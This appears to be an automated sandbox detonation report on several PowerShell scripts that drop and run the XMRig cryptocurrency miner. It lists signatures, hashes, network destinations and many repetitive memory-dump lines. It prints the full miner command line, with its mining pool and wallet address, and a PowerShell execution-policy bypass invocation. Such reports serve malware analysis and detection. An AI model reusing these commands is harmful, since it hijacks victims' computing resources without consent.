memory/4584-69-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-70-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-71-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-72-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-73-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-74-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-75-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-76-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-77-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-78-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-79-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-80-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-81-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-82-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-83-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-84-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-85-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-86-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-87-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-88-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-89-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-90-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-91-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-92-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-93-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-94-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-95-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-96-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-97-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-98-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-99-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-100-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-101-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-102-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-103-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-104-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-105-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-106-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-107-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-108-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-109-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-110-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-111-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-112-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-113-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-114-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-115-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-116-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-117-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-118-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:27

Platform

win10-20240404-en

Max time kernel

1788s

Max time network

1763s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4052-3-0x00007FFFEE743000-0x00007FFFEE744000-memory.dmp

memory/4052-5-0x000001F032B40000-0x000001F032B62000-memory.dmp

memory/4052-6-0x00007FFFEE740000-0x00007FFFEF12C000-memory.dmp

memory/4052-9-0x00007FFFEE740000-0x00007FFFEF12C000-memory.dmp

memory/4052-10-0x000001F033060000-0x000001F0330D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xzggcjbu.efi.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4052-25-0x00007FFFEE740000-0x00007FFFEF12C000-memory.dmp

memory/4052-48-0x000001F033020000-0x000001F033032000-memory.dmp

memory/4052-61-0x000001F032BB0000-0x000001F032BBA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4168-90-0x0000021D34370000-0x0000021D34390000-memory.dmp

memory/4168-91-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4052-92-0x00007FFFEE740000-0x00007FFFEF12C000-memory.dmp

memory/4052-94-0x00007FFFEE743000-0x00007FFFEE744000-memory.dmp

memory/4168-93-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4052-95-0x00007FFFEE740000-0x00007FFFEF12C000-memory.dmp

memory/4052-96-0x00007FFFEE740000-0x00007FFFEF12C000-memory.dmp

memory/4168-97-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-98-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-99-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-100-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-101-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-102-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-103-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-104-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-105-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-106-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-107-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-108-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-109-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-110-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-111-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-112-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-113-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-114-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-115-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-116-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-117-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-118-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-119-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-120-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-121-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-122-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-123-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-124-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-125-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-126-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-127-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-128-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-129-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-130-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-131-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-132-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-133-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-134-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-135-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-136-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-137-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-138-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-139-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-140-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-141-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-142-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-143-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-144-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-145-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-146-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-147-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-148-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-149-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-150-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-151-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-152-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-153-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-154-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-155-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-156-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

memory/4168-157-0x00007FF64ED30000-0x00007FF64F963000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:29

Platform

win7-20240221-en

Max time kernel

1557s

Max time network

1563s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Network

N/A

Files

memory/2704-4-0x000007FEF4D5E000-0x000007FEF4D5F000-memory.dmp

memory/2704-5-0x000000001B310000-0x000000001B5F2000-memory.dmp

memory/2704-6-0x0000000001EC0000-0x0000000001EC8000-memory.dmp

memory/2704-7-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

memory/2704-8-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

memory/2704-9-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

memory/2704-10-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

memory/2704-11-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

memory/2704-12-0x000007FEF4AA0000-0x000007FEF543D000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:31

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1754s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/4540-0-0x00007FF8AF043000-0x00007FF8AF045000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e4ndc4ea.hkl.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4540-9-0x00007FF8AF040000-0x00007FF8AFB02000-memory.dmp

memory/4540-10-0x000001AE9FA80000-0x000001AE9FAA2000-memory.dmp

memory/4540-11-0x00007FF8AF040000-0x00007FF8AFB02000-memory.dmp

memory/4540-12-0x00007FF8AF040000-0x00007FF8AFB02000-memory.dmp

memory/4540-14-0x000001AEB81D0000-0x000001AEB81E2000-memory.dmp

memory/4540-15-0x000001AEB81C0000-0x000001AEB81CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/960-46-0x000001FB40660000-0x000001FB40680000-memory.dmp

memory/960-47-0x000001FB406A0000-0x000001FB406C0000-memory.dmp

memory/960-48-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/4540-49-0x00007FF8AF043000-0x00007FF8AF045000-memory.dmp

memory/4540-50-0x00007FF8AF040000-0x00007FF8AFB02000-memory.dmp

memory/4540-51-0x00007FF8AF040000-0x00007FF8AFB02000-memory.dmp

memory/960-53-0x000001FB406E0000-0x000001FB40700000-memory.dmp

memory/960-52-0x000001FB406C0000-0x000001FB406E0000-memory.dmp

memory/960-54-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-55-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-56-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-58-0x000001FB406E0000-0x000001FB40700000-memory.dmp

memory/960-57-0x000001FB406C0000-0x000001FB406E0000-memory.dmp

memory/960-59-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-60-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-61-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-62-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-63-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-64-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-65-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-66-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-67-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-68-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-69-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-70-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-71-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-72-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-73-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-74-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-75-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-76-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-77-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-78-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-79-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-80-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-81-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-82-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-83-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-84-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-85-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-86-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-87-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-88-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-89-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-90-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-91-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-92-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-93-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-94-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-95-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-96-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-97-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-98-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-99-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-100-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-101-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-102-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-103-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-104-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-105-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-106-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-107-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-108-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-109-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-110-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-111-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-112-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-113-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-114-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-115-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-116-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

memory/960-117-0x00007FF7957E0000-0x00007FF796413000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:48

Platform

win11-20240419-en

Max time kernel

1789s

Max time network

1798s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
